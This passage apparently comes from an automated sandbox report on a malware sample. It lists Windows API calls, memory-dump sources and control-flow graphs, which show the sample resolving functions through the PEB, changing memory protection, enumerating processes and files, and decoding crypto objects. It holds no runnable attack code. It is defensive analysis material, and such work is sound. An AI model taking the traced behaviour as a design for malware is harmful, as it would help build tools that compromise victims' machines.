                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,020C13D8,00000000,00000007,00000007,^@,004176A0,00000000), ref: 0041A003
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041A026
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$FreeHeap__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 38926842-3067454934
                                                                  APIs
                                                                  • GetClassInfoA.USER32(?,-0000007C,?), ref: 004214FD
                                                                  Similarity
                                                                  • API ID: ClassInfo
                                                                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                  • API String ID: 3534257612-2801496823
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 021C2468
                                                                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021C24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: @
                                                                  • API String ID: 544645111-2766056989
                                                                  APIs
                                                                    • Part of subcall function 00405C41: GetWindowExtEx.GDI32(?,?), ref: 00405C4D
                                                                    • Part of subcall function 00405C1D: GetViewportExtEx.GDI32(?,?), ref: 00405C29
                                                                  • MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                  • MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ViewportWindow
                                                                  • String ID: Fw@
                                                                  • API String ID: 1589084482-2650048193
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: (C$8C
                                                                  • API String ID: 3519838083-3442521767
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                  • LocalFree.KERNEL32(?), ref: 00429C2E
                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                  • String ID:
                                                                  • API String ID: 2949335588-0
                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00411300,00000000,?,00000000), ref: 00410D36
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00411300,00000000,?,00000000), ref: 00410D6F
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00410D8D
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00410DA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                  • LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429EAC: InitializeCriticalSection.KERNEL32(0043F21C,00429F23,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429EC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitialize$Leave
                                                                  • String ID:
                                                                  • API String ID: 713024617-0

                                                                  Execution Graph

                                                                  Execution Coverage:6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:1.7%
                                                                  Total number of Nodes:541
                                                                  Total number of Limit Nodes:54
                                                                  execution_graph
12274->12270 12275 21f9cae GetCurrentProcess QueryFullProcessImageNameW 12275->12279 12276 21f3f20 GetPEB 12276->12279 12280 21f9d30 12277->12280 12278 21f3e80 GetPEB 12278->12279 12279->12272 12279->12273 12279->12275 12279->12276 12279->12278 12281 21f3e80 GetPEB 12280->12281 12282 21f9d3c 12281->12282 12282->12274 12568 21f5360 12572 21f5370 12568->12572 12569 21f5452 12570 21f53fc GetNativeSystemInfo 12570->12572 12571 21f3f20 GetPEB 12571->12572 12572->12569 12572->12570 12572->12571 12573 21f3e80 GetPEB 12572->12573 12573->12572 12574 21f5f60 12595 21f5490 12574->12595 12576 21f6039 12607 21f35c0 12576->12607 12577 21f6031 12579 21f3f20 GetPEB 12585 21f5f74 12579->12585 12580 21f6044 12581 21f6065 12580->12581 12583 21f3f20 GetPEB 12580->12583 12587 21f609f 12581->12587 12588 21f3f20 GetPEB 12581->12588 12582 21f3e80 GetPEB 12582->12585 12584 21f6059 12583->12584 12586 21f3e80 GetPEB 12584->12586 12585->12576 12585->12577 12585->12579 12585->12582 12586->12581 12590 21f60c7 12587->12590 12592 21f3f20 GetPEB 12587->12592 12589 21f6093 12588->12589 12591 21f3e80 GetPEB 12589->12591 12591->12587 12593 21f60bb 12592->12593 12594 21f3e80 GetPEB 12593->12594 12594->12590 12596 21f54a6 12595->12596 12602 21f54bc 12595->12602 12597 21f3f20 GetPEB 12596->12597 12598 21f54b0 12597->12598 12599 21f3e80 GetPEB 12598->12599 12599->12602 12600 21f5533 12600->12585 12601 21f551b GetVolumeInformationW 12601->12600 12602->12600 12602->12601 12603 21f3f20 GetPEB 12602->12603 12604 21f550a 12603->12604 12605 21f3e80 GetPEB 12604->12605 12606 21f5516 12605->12606 12606->12601 12608 21f35e4 12607->12608 12609 21f3609 12608->12609 12610 21f3f20 GetPEB 12608->12610 12613 21f3f20 GetPEB 12609->12613 12616 21f3631 12609->12616 12611 21f35fd 12610->12611 12612 21f3e80 GetPEB 12611->12612 12612->12609 12614 21f3625 12613->12614 12615 21f3e80 GetPEB 12614->12615 12615->12616 12616->12580 12616->12616

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 21b1030-21b1075 LoadLibraryW GetProcAddress call 21b1b30 3 21b107e-21b108f 0->3 4 21b1077-21b1079 0->4 6 21b10a3-21b10be call 21b1b30 3->6 7 21b1091-21b109e SetLastError 3->7 5 21b148d-21b1490 4->5 10 21b10c0-21b10c2 6->10 11 21b10c7-21b10dc 6->11 7->5 10->5 12 21b10de-21b10eb SetLastError 11->12 13 21b10f0-21b10fd 11->13 12->5 14 21b10ff-21b110c SetLastError 13->14 15 21b1111-21b111a 13->15 14->5 16 21b112e-21b114f 15->16 17 21b111c-21b1129 SetLastError 15->17 18 21b1163-21b116d 16->18 17->5 19 21b116f-21b1176 18->19 20 21b11a5-21b11d5 GetNativeSystemInfo call 21b18d0 * 2 18->20 21 21b1178-21b1184 19->21 22 21b1186-21b1192 19->22 31 21b11e9-21b120c call 21b1800 20->31 32 21b11d7-21b11e4 SetLastError 20->32 24 21b1195-21b119b 21->24 22->24 26 21b119d-21b11a0 24->26 27 21b11a3 24->27 26->27 27->18 34 21b120e-21b121f call 21b1800 31->34 35 21b123d-21b1255 GetProcessHeap RtlAllocateHeap 31->35 32->5 38 21b1222-21b122c 34->38 36 21b127b-21b1291 35->36 37 21b1257-21b1276 SetLastError 35->37 39 21b129c 36->39 40 21b1293-21b129a 36->40 37->5 38->35 41 21b122e-21b1238 SetLastError 38->41 43 21b12a3-21b1300 call 21b1b30 39->43 40->43 41->5 46 21b1302 43->46 47 21b1307-21b1370 call 21b1800 call 21b1980 call 21b1b50 43->47 48 21b147f-21b148b call 21b16c0 46->48 56 21b1372 47->56 57 21b1377-21b1388 47->57 48->5 56->48 58 21b138a-21b13a0 call 21b2090 57->58 59 21b13a2-21b13a5 57->59 61 21b13ac-21b13ba call 21b21a0 58->61 59->61 65 21b13bc 61->65 66 21b13c1-21b13c5 call 21b1e80 61->66 65->48 68 21b13ca-21b13cf 66->68 69 21b13d1 68->69 70 21b13d6-21b13e4 call 21b2010 68->70 69->48 73 21b13eb-21b13f4 70->73 74 21b13e6 70->74 75 21b1470-21b1473 73->75 76 21b13f6-21b13fd 73->76 74->48 79 21b147a-21b147d 75->79 77 21b13ff-21b145b GetPEB 76->77 78 21b145d-21b146b 76->78 80 21b146e 77->80 78->80 79->5 80->79
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(021B4054,021B4040), ref: 021B1047
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021B104E
                                                                    • Part of subcall function 021B1B30: SetLastError.KERNEL32(0000000D,?,021B1070,?,00000040), ref: 021B1B3D
                                                                  • SetLastError.KERNEL32(000000C1), ref: 021B1096
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1866314245-0
                                                                  • Opcode ID: 0084b633ff05030a67721671d030c960c8419b7e115d5c1a1ec815c21720ced9
                                                                  • Instruction ID: 2c7b2b3a594f18cdf5198ec9edd4cd9c93e4c301a5b9ba3faa8e64fbd283306b
                                                                  • Opcode Fuzzy Hash: 0084b633ff05030a67721671d030c960c8419b7e115d5c1a1ec815c21720ced9
                                                                  • Instruction Fuzzy Hash: E5F1F5B4E40209EFDB05CF94D994BAEB7B1BF48304F218598E919AB351D734EA51CFA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 85 21f38f0-21f390b 86 21f3910-21f3915 85->86 87 21f391b 86->87 88 21f3a74-21f3a79 86->88 89 21f3a2c-21f3a33 87->89 90 21f3921-21f3926 87->90 91 21f3a7f-21f3a84 88->91 92 21f3b62-21f3b67 88->92 97 21f3a35-21f3a4b call 21f3f20 call 21f3e80 89->97 98 21f3a50-21f3a64 FindFirstFileW 89->98 93 21f3988-21f399b call 21f34c0 90->93 94 21f3928-21f392d 90->94 95 21f393a-21f393f 91->95 96 21f3a8a-21f3a8f 91->96 92->86 123 21f399d-21f39b3 call 21f3f20 call 21f3e80 93->123 124 21f39b8-21f39d3 93->124 99 21f392f-21f3934 94->99 100 21f394c-21f3953 94->100 95->86 103 21f3941-21f394b 95->103 101 21f3b3c-21f3b5d 96->101 102 21f3a95-21f3a9b 96->102 97->98 106 21f3a6a-21f3a6f 98->106 107 21f3b93-21f3b9d 98->107 99->95 108 21f3b6c-21f3b73 99->108 111 21f3955-21f396b call 21f3f20 call 21f3e80 100->111 112 21f3970-21f3986 FindNextFileW 100->112 101->86 109 21f3abf-21f3ac1 102->109 110 21f3a9d-21f3aa5 102->110 106->86 121 21f3b75-21f3b8b call 21f3f20 call 21f3e80 108->121 122 21f3b90-21f3b91 FindClose 108->122 116 21f3ab5-21f3aba 109->116 118 21f3ac3-21f3ad6 call 21f34c0 109->118 115 21f3aa7-21f3aab 110->115 110->116 111->112 112->86 115->109 126 21f3aad-21f3ab3 115->126 116->86 140 21f3ad8-21f3aee call 21f3f20 call 21f3e80 118->140 141 21f3af3-21f3b23 call 21f38f0 118->141 121->122 122->107 123->124 137 21f39d5-21f39eb call 21f3f20 call 21f3e80 124->137 138 21f39f0-21f39fb 124->138 126->109 126->116 137->138 154 21f39fd-21f3a13 call 21f3f20 call 21f3e80 138->154 155 21f3a18-21f3a27 138->155 140->141 157 21f3b28-21f3b37 call 21f3460 141->157 154->155 155->86 157->86
                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,00000000,021F998D,16BF64F2,00000001), ref: 021F3976
                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,021F998D,16BF64F2,00000001), ref: 021F3A5D
                                                                  • FindClose.KERNELBASE(?,00000000,021F998D,16BF64F2,00000001), ref: 021F3B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: .$8T]$8T]$Ei$Ei
                                                                  • API String ID: 3541575487-3972632629
                                                                  • Opcode ID: c6eb74326a3090d0e37720cb6344acecc99cebee58611247717fafc6732cdda3
                                                                  • Instruction ID: 5feacda54cd0ad030147adbf2a03266489589671f6b91ed6c88075ffdc1f02ee
                                                                  • Opcode Fuzzy Hash: c6eb74326a3090d0e37720cb6344acecc99cebee58611247717fafc6732cdda3
                                                                  • Instruction Fuzzy Hash: 2C51D471BC42819BC7E8AB75A85467B36E6ABC0344F140D9DEF76C7280EB35C8458793

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 341 21f4cb0-21f4cc6 342 21f4cd0-21f4cd5 341->342 343 21f4d9f-21f4da4 342->343 344 21f4cdb 342->344 347 21f4da6-21f4dab 343->347 348 21f4dc2-21f4dc9 343->348 345 21f4d84-21f4d9a 344->345 346 21f4ce1-21f4ce6 344->346 345->342 351 21f4d3d-21f4d4c 346->351 352 21f4ce8-21f4ced 346->352 353 21f4dad-21f4db2 347->353 354 21f4de8-21f4def 347->354 349 21f4dcb-21f4de6 call 21f3f20 call 21f3e80 348->349 350 21f4d69-21f4d7f Process32FirstW 348->350 349->350 350->342 351->350 356 21f4d4e-21f4d64 call 21f3f20 call 21f3e80 351->356 359 21f4cef-21f4cf4 352->359 360 21f4d01-21f4d08 352->360 353->342 362 21f4db8-21f4dc1 353->362 357 21f4e0c-21f4e0d FindCloseChangeNotification 354->357 358 21f4df1-21f4e07 call 21f3f20 call 21f3e80 354->358 356->350 369 21f4e0f-21f4e18 357->369 358->357 359->353 366 21f4cfa-21f4cff 359->366 367 21f4d0a-21f4d20 call 21f3f20 call 21f3e80 360->367 368 21f4d25-21f4d30 CreateToolhelp32Snapshot 360->368 366->342 367->368 368->369 370 21f4d36-21f4d3b 368->370 370->342
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 021F4D29
                                                                  • Process32FirstW.KERNEL32(00000000,?,?,00000000,?), ref: 021F4D6F
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 021F4E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
                                                                  • String ID: n\9$.#v
                                                                  • API String ID: 692674288-3968600533
                                                                  • Opcode ID: 067e6c038b5f10eb50f59eeb72ea6d7104f7eb4d7e300a2ab35b7f7e3d5515c2
                                                                  • Instruction ID: cabaca1259b607e10266d4b43a4079996aace2dc7d2141cb002060879c73e367
                                                                  • Opcode Fuzzy Hash: 067e6c038b5f10eb50f59eeb72ea6d7104f7eb4d7e300a2ab35b7f7e3d5515c2
                                                                  • Instruction Fuzzy Hash: C4314C77BC0201A7D7A45AB9B46473F32EA9B90208F15092AE775C7380F778CC5547E2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 420 21f8240-21f832a 421 21f8332-21f8338 420->421 422 21f833e 421->422 423 21f8431-21f8437 421->423 426 21f83fc-21f8403 422->426 427 21f8344-21f834a 422->427 424 21f843d-21f8443 423->424 425 21f84c3-21f84c8 423->425 430 21f84ac-21f84b2 424->430 431 21f8445-21f844c 424->431 425->421 428 21f8405-21f841b call 21f3f20 call 21f3e80 426->428 429 21f8420-21f842c 426->429 432 21f834c-21f8352 427->432 433 21f83c0-21f83c7 427->433 428->429 429->421 430->421 439 21f84b8-21f84c2 430->439 440 21f844e-21f8464 call 21f3f20 call 21f3e80 431->440 441 21f8469-21f848c 431->441 434 21f84cd-21f8515 call 21fb590 432->434 435 21f8358-21f835e 432->435 437 21f83c9-21f83df call 21f3f20 call 21f3e80 433->437 438 21f83e4-21f83f7 433->438 434->439 457 21f8517 434->457 435->430 443 21f8364-21f836c 435->443 437->438 438->421 440->441 459 21f848e-21f84a4 call 21f3f20 call 21f3e80 441->459 460 21f84a9 441->460 451 21f836e-21f8386 call 21f3f20 call 21f3e80 443->451 452 21f838c-21f83b0 CreateFileW 443->452 451->452 452->439 462 21f83b6-21f83bb 452->462 465 21f851d-21f852a 457->465 466 21f8519-21f851b 457->466 459->460 460->430 462->421 466->439 466->465
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 021F83A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: @1#v$J$.#v
                                                                  • API String ID: 823142352-3152639806
                                                                  • Opcode ID: 7e661b43b6b1658975cf5e64fb3920b6a4e8dad1accd2fd410a27d0ea341b2b2
                                                                  • Instruction ID: 17dbb74851171a34d43cc1f3353196310ddbd510d3a7faa0d66aee861bcb3c87
                                                                  • Opcode Fuzzy Hash: 7e661b43b6b1658975cf5e64fb3920b6a4e8dad1accd2fd410a27d0ea341b2b2
                                                                  • Instruction Fuzzy Hash: 6E61CE72A883419FC788DF68D484A2FB7E1ABC4744F05891DF6B59B290D774D9098F82

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 614 21f2650-21f265c 615 21f2660-21f2666 614->615 616 21f280d-21f2813 615->616 617 21f266c 615->617 620 21f294d-21f2953 616->620 621 21f2819 616->621 618 21f27bc-21f27c4 617->618 619 21f2672-21f2678 617->619 628 21f27c6-21f27de call 21f3f20 call 21f3e80 618->628 629 21f27e4-21f27f6 618->629 622 21f267e 619->622 623 21f275b-21f2761 619->623 626 21f276f-21f2775 620->626 627 21f2959-21f2960 620->627 624 21f281f-21f2825 621->624 625 21f28f3-21f28fa 621->625 633 21f2707-21f270f 622->633 634 21f2684-21f268a 622->634 640 21f2783-21f278a 623->640 641 21f2763-21f2769 623->641 635 21f282b-21f2831 624->635 636 21f28b8-21f28bf 624->636 631 21f28fc-21f2912 call 21f3f20 call 21f3e80 625->631 632 21f2917-21f2948 CryptDecodeObjectEx 625->632 626->615 630 21f277b-21f2782 626->630 637 21f297d-21f298d 627->637 638 21f2962-21f2978 call 21f3f20 call 21f3e80 627->638 628->629 642 21f27fb-21f27fd 629->642 631->632 632->615 644 21f272f-21f273f 633->644 645 21f2711-21f2729 call 21f3f20 call 21f3e80 633->645 651 21f268c-21f2692 634->651 652 21f26ea-21f26fb call 21f42f0 634->652 635->626 646 21f2837-21f283f 635->646 653 21f28dc-21f28ee 636->653 654 21f28c1-21f28d7 call 21f3f20 call 21f3e80 636->654 637->615 638->637 649 21f278c-21f27a2 call 21f3f20 call 21f3e80 640->649 650 21f27a7-21f27b7 640->650 641->626 648 21f2992-21f29a4 call 21f4250 641->648 657 21f29a5-21f29af 642->657 658 21f2803-21f2808 642->658 676 21f2744-21f2756 644->676 645->644 661 21f285f-21f2874 646->661 662 21f2841-21f2859 call 21f3f20 call 21f3e80 646->662 649->650 650->615 651->626 667 21f2698-21f269f 651->667 652->630 684 21f26fd-21f2702 652->684 653->615 654->653 658->615 689 21f2879-21f2890 661->689 662->661 680 21f26bc-21f26d0 667->680 681 21f26a1-21f26b7 call 21f3f20 call 21f3e80 667->681 676->615 693 21f26d3-21f26e5 680->693 681->680 684->615 696 21f28ad-21f28b3 689->696 697 21f2892-21f28a8 call 21f3f20 call 21f3e80 689->697 693->615 
696->626 697->696
                                                                  APIs
                                                                  • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 021F2934
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CryptDecodeObject
                                                                  • String ID: 3$
                                                                  • API String ID: 1207547050-3878113309
                                                                  • Opcode ID: 91850988d691e8adc5ae3304372b581d4570b489b3390b7cb7c9c32956a5c668
                                                                  • Instruction ID: f40ca59952d67fcb1e9a6bce94ab4bf9dee2665be91c44fdc8f8a3d37741bcbc
                                                                  • Opcode Fuzzy Hash: 91850988d691e8adc5ae3304372b581d4570b489b3390b7cb7c9c32956a5c668
                                                                  • Instruction Fuzzy Hash: 1771DC32FC01525FCBE4AA65EC50B6736D3AB84704F164569EF369F294EB309C518BC2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
